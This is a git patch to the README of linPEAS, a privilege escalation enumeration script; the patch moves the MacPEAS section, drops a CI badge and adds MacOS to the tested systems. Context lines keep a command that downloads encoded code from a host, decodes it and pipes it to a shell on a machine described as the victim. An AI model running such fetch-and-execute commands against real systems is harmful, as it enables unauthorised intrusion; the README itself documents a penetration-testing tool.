From 9709d5374937b46b56165d23e691a26302a20611 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Thu, 2 Sep 2021 11:10:30 +0100 Subject: [PATCH] Update README.md --- linPEAS/README.md | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/linPEAS/README.md b/linPEAS/README.md index 67e3f00..3ec7562 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -1,5 +1,4 @@ # LinPEAS - Linux Privilege Escalation Awesome Script -[![CI-master_test](https://github.com/carlospolop/PEASS-ng/actions/workflows/CI-master_tests.yml/badge.svg)](https://github.com/carlospolop/PEASS-ng/actions/workflows/CI-master_tests.yml) ![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png) @@ -9,6 +8,9 @@ Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks [![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/309566) +## MacPEAS + +Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed** ## Quick Start ```bash @@ -49,13 +51,9 @@ sudo python -m SimpleHTTPServer 80 #Start HTTP server curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim ``` -## MacPEAS - -Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed!!** - ## Basic Information -The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD and OpenBSD). +The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS). This script doesn't have any dependency.